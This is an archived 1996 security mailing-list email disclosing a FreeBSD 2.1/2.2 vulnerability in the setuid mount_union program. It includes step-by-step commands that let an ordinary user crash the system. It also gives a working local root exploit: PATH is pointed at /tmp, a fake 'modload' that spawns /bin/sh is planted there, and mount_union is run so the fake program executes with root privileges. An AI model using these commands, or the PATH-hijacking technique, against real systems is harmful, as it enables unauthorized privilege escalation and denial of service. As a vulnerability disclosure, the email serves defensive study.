From CHRISL@gazeta.pl Fri May 17 17:20:59 1996 Received: from melbourne.world.net (melbourne.world.net [198.142.2.1]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id RAA08324 for ; Fri, 17 May 1996 17:20:22 +1000 Received: from gwx.gazeta.pl (root@gwx.gazeta.pl [194.92.114.4]) by melbourne.world.net (8.7.4/8.6.6) with SMTP id RAA29056 for ; Fri, 17 May 1996 17:21:38 +1000 (EST) Received: from gwrbis.gazeta.pl (gwrbis.gazeta.pl [194.92.114.30]) by gwx.gazeta.pl (8.6.12/1.0.2) with ESMTP id JAA28232 for ; Fri, 17 May 1996 09:12:23 +0200 Received: from GWRBIS/SpoolDir by gwrbis.gazeta.pl (Mercury 1.21); 17 May 96 09:12:55 MET Received: from SpoolDir by GWRBIS (Mercury 1.21); 17 May 96 09:12:18 MET From: "Krzysztof Labanowski" Organization: Gazeta Wyborcza To: best-of-security@suburbia.net Date: Fri, 17 May 1996 09:12:13 METDST MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: SECURITY BUG in FreeBSD Priority: normal X-mailer: Pegasus Mail v3.31 Message-ID: <1AA5E140363@gwrbis.gazeta.pl> Hi! FreeBSD has a security hole... dangerous is mount_union if suid is set vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT probably FreeBSD 2.1 STABLE is not vulnerable to crash system (as a normal user) try this: mkdir a mkdir b mount_union ~/a ~/b mount_union -b ~/a ~/b to got euid try this: export PATH=/tmp:$PATH #if zsh, of course echo /bin/sh >/tmp/modload chmod +x /tmp/modload mount_union /dir1 /dir2 and You are root! Hole found by Adam Kubicki Best wishes Chris Labanowski KL